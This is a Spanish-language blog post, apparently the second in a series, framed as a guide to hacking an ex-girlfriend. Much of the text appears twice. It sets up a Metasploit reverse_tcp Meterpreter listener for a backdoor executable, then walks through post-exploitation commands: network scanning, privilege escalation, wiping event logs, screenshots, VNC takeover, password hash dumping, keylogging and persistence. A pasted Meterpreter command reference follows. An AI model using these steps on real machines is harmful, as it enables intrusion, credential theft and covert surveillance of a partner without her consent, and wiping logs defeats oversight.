Meterpreter.exploit your ex-girlfriend Parte II
Después del éxito-no de mi anterior post sobre Creating .exe backdoor and exploit your ex-girl-friend, seguimos con la segunda parte...
Vamos a realizar el mismo ataque, con unas mejoras, y lo que es mejor, en modo asistente !!:
Pulse 1 si desea ver sufrir a su ex-novia. Pulse 2 si desea hackear el Facebook de su ex-novia... xD
Para realizar el ataque, vamos a usar Set web, por qué? porque es mas bonito hacerlo graficamente, aunque después de trabajar el entorno gráfico de Set, tengo que decir que hay menús que no andan bien, seré yo xD.
Para ejecutar el entorno web basta con situarnos en la carpeta ( soy windosero !!!) pentest/exploit/set de nuestra maquina de matar Backtrack. vemos el script de set-web, pero carece de permisos de ejecución, por lo que le tiramos un CHMOD 775 al fichero set-web, y lo ejecutamos.
El aspecto es el siguiente:
Un ejemplo de las funciones disponibles.
Saltamos otra vez al primer post para retomarlo donde lo dejamos, en una consola Meterpreter. En el ejemplo anterior iniciamos una shell Windows, pero todos sabemos que esto no es suficiente.
Las categorías de los comandos son:
1. Core Commands
2. STDapi : File Commands
3. STDapi : Networking Commands
4. STDapi : File- System Commands
5. STDapi : User Interface Commands
6. STDapi : Web Cam Commands
7. Priv : Elevate Commands
8. Priv : Password database Commands
9. Priv : Time Stomp commands
Fuente:http://dl.packetstormsecurity.net/papers/attack/post-exploitation.pdf
Vamos a comentar algunos scripts para usar en la post-explotación del sistema comprometido.
Por ejemplo, que pasa si tenemos nuestro backdoor creado, tenemos el listener de Metasploit escuchando, esperando que nuestra víctima lo ejecute, pero qué pasa si se apaga el ordenador xD, el nuestro...
msfconsole- use exploit/multi/handler.
set PAYLOADS windows/meterpreter/reverse_tcp
Metemos ip local, e importante, definimos el puerto con set que quedará a la escucha. si dejamos el que metasploit nos ofrece por defecto,44444 no recibirá nada, ya que creo recordar que pusimos 443. y luego ejecutamos exploit.
Vamos a probar cosas.
Run arp_scanner -i nos muestra las interfaces de red en el equipo comprometido. Algo muy interesante ya que generalmente cuando realizamos una prueba de intrusión queremos llegar al máximo número de sistemas, y saber la estructura de la red interna es algo básico. Una vez conocemos el rango de Ip´s internos, ejecutamos un Run arp_scanner -r RANGO DE RED y con esto tenemos los host de la red, al menos los de la tabla ARP del host.
Run Checkvm nos revela información si es una máquina física o virtual. **esta máquina es virtual, pero es un windows xp que ha sufrido cierto hardening respecto a ocultar sus características virtuales, como es quitar guest tools, cambiar mac y sobre todo, cambiar el id vendor, serial y demás de la BIOS virtual**
Run Getsystem para realizar una escalada de privilegios brutal, nada mas y menos que system...
Run Getcountermeasures para listar las protecciones instaladas en el sistema, en caso de ser Windows.
Run Prefetchtool para ver la lista de las últimas aplicaciones usadas.
Run get_env para listar las variables globales del sistema y el usuario.
Run clearev para borrar los eventos del visor de sucesos...en máquinas windows claro.
Run screenshot para tener una captura de pantalla de equipo víctima.
Run VNC para montar un servidor VNC en la víctima y automáticamente conectarnos.Por cierto, la "víctima" estaba leyendo una página web muy muy interesante xD
Run Get_application_list para mostrar una lista de aplicaciones instaladas en el sistema.
Hashdump, para mostrar los hashes de las claves de los usuarios. Os invito a que si alguno tiene paciencia de escribir el hash de los usuarios en google a ver si aparece.
Run keylogrecorder para grabar las pulsaciones del teclado de la víctima.
Por último, POR HOY, persistencia. es decir, que no tengas que difundir el backdoor exe a la víctima cada vez que queramos "hacer cosas", aunque sobre este punto, al igual que las técnicas de evasión de ids/av que otro día terminaré, ahora es que tengo hambre xD.
Espero que os haya gustado esta aproximacion al mundo Meterpreter, no me mal interpretes xD Espero que pruebes tus cositas, que preguntes lo que no te quede claro, y que estés pendiente de las nuevas entradas xD.
gracias.
Vamos a realizar el mismo ataque, con unas mejoras, y lo que es mejor, en modo asistente !!:
Pulse 1 si desea ver sufrir a su ex-novia. Pulse 2 si desea hackear el Facebook de su ex-novia... xD
Para realizar el ataque, vamos a usar Set web, por qué? porque es mas bonito hacerlo graficamente, aunque después de trabajar el entorno gráfico de Set, tengo que decir que hay menús que no andan bien, seré yo xD.
Para ejecutar el entorno web basta con situarnos en la carpeta ( soy windosero !!!) pentest/exploit/set de nuestra maquina de matar Backtrack. vemos el script de set-web, pero carece de permisos de ejecución, por lo que le tiramos un CHMOD 775 al fichero set-web, y lo ejecutamos.
El aspecto es el siguiente:
Un ejemplo de las funciones disponibles.
Saltamos otra vez al primer post para retomarlo donde lo dejamos, en una consola Meterpreter. En el ejemplo anterior iniciamos una shell Windows, pero todos sabemos que esto no es suficiente.
Las categorías de los comandos son:
1. Core Commands
2. STDapi : File Commands
3. STDapi : Networking Commands
4. STDapi : File- System Commands
5. STDapi : User Interface Commands
6. STDapi : Web Cam Commands
7. Priv : Elevate Commands
8. Priv : Password database Commands
9. Priv : Time Stomp commands
Fuente:http://dl.packetstormsecurity.net/papers/attack/post-exploitation.pdf
Command Description |
07 | ------- ----------- |
08 | ? Help menu |
09 | background Backgrounds the current session |
10 | channel Displays information about active channels |
11 | close Closes a channel |
12 | exit Terminate the meterpreter session |
13 | help Help menu |
14 | interact Interacts with a channel |
15 | irb Drop into irb scripting mode |
16 | migrate Migrate the server to another process |
17 | quit Terminate the meterpreter session |
18 | read Reads data from a channel |
19 | run Executes a meterpreter script |
20 | use Load a one or more meterpreter extensions |
21 | write Writes data to a channel |
22 | |
23 | Stdapi: File system Commands |
24 | ============================ |
25 | |
26 | Command Description |
27 | ------- ----------- |
28 | cat Read the contents of a file to the screen |
29 | cd Change directory |
30 | del Delete the specified file |
31 | download Download a file or directory |
32 | edit Edit a file |
33 | getlwd Print local working directory |
34 | getwd Print working directory |
35 | lcd Change local working directory |
36 | lpwd Print local working directory |
37 | ls List files |
38 | mkdir Make directory |
39 | pwd Print working directory |
40 | rm Delete the specified file |
41 | rmdir Remove directory |
42 | upload Upload a file or directory |
43 | |
44 | Stdapi: Networking Commands |
45 | =========================== |
46 | |
47 | Command Description |
48 | ------- ----------- |
49 | ipconfig Display interfaces |
50 | portfwd Forward a local port to a remote service |
51 | route View and modify the routing table |
52 | |
53 | Stdapi: System Commands |
54 | ======================= |
55 | |
56 | Command Description |
57 | ------- ----------- |
58 | clearev Clear the event log |
59 | execute Execute a command |
60 | getpid Get the current process identifier |
61 | getuid Get the user that the server is running as |
62 | kill Terminate a process |
63 | ps List running processes |
64 | reboot Reboots the remote computer |
65 | reg Modify and interact with the remote registry |
66 | rev2self Calls RevertToSelf() on the remote machine |
67 | shell Drop into a system command shell |
68 | shutdown Shuts down the remote computer |
69 | sysinfo Gets information about the remote system, such as OS |
70 | |
71 | Stdapi: User interface Commands |
72 | =============================== |
73 | |
74 | Command Description |
75 | ------- ----------- |
76 | enumdesktops List all accessible desktops and window stations |
77 | idletime Returns the number of seconds the remote user has been idle |
78 | keyscan_dump Dump they keystroke buffer |
79 | keyscan_start Start capturing keystrokes |
80 | keyscan_stop Stop capturing keystrokes |
81 | setdesktop Move to a different workstation and desktop |
82 | uictl Control some of the user interface components |
Por ejemplo, que pasa si tenemos nuestro backdoor creado, tenemos el listener de Metasploit escuchando, esperando que nuestra víctima lo ejecute, pero qué pasa si se apaga el ordenador xD, el nuestro...
msfconsole- use exploit/multi/handler.
set PAYLOADS windows/meterpreter/reverse_tcp
Metemos ip local, e importante, definimos el puerto con set que quedará a la escucha. si dejamos el que metasploit nos ofrece por defecto,44444 no recibirá nada, ya que creo recordar que pusimos 443. y luego ejecutamos exploit.
Vamos a probar cosas.
Run arp_scanner -i nos muestra las interfaces de red en el equipo comprometido. Algo muy interesante ya que generalmente cuando realizamos una prueba de intrusión queremos llegar al máximo número de sistemas, y saber la estructura de la red interna es algo básico. Una vez conocemos el rango de Ip´s internos, ejecutamos un Run arp_scanner -r RANGO DE RED y con esto tenemos los host de la red, al menos los de la tabla ARP del host.
Run Checkvm nos revela información si es una máquina física o virtual. **esta máquina es virtual, pero es un windows xp que ha sufrido cierto hardening respecto a ocultar sus características virtuales, como es quitar guest tools, cambiar mac y sobre todo, cambiar el id vendor, serial y demás de la BIOS virtual**
Run Getsystem para realizar una escalada de privilegios brutal, nada mas y menos que system...
Run Prefetchtool para ver la lista de las últimas aplicaciones usadas.
Run get_env para listar las variables globales del sistema y el usuario.
Run clearev para borrar los eventos del visor de sucesos...en máquinas windows claro.
Run screenshot para tener una captura de pantalla de equipo víctima.
Run VNC para montar un servidor VNC en la víctima y automáticamente conectarnos.Por cierto, la "víctima" estaba leyendo una página web muy muy interesante xD
Run Get_application_list para mostrar una lista de aplicaciones instaladas en el sistema.
Hashdump, para mostrar los hashes de las claves de los usuarios. Os invito a que si alguno tiene paciencia de escribir el hash de los usuarios en google a ver si aparece.
Run keylogrecorder para grabar las pulsaciones del teclado de la víctima.
Por último, POR HOY, persistencia. es decir, que no tengas que difundir el backdoor exe a la víctima cada vez que queramos "hacer cosas", aunque sobre este punto, al igual que las técnicas de evasión de ids/av que otro día terminaré, ahora es que tengo hambre xD.
Espero que os haya gustado esta aproximacion al mundo Meterpreter, no me mal interpretes xD Espero que pruebes tus cositas, que preguntes lo que no te quede claro, y que estés pendiente de las nuevas entradas xD.
gracias.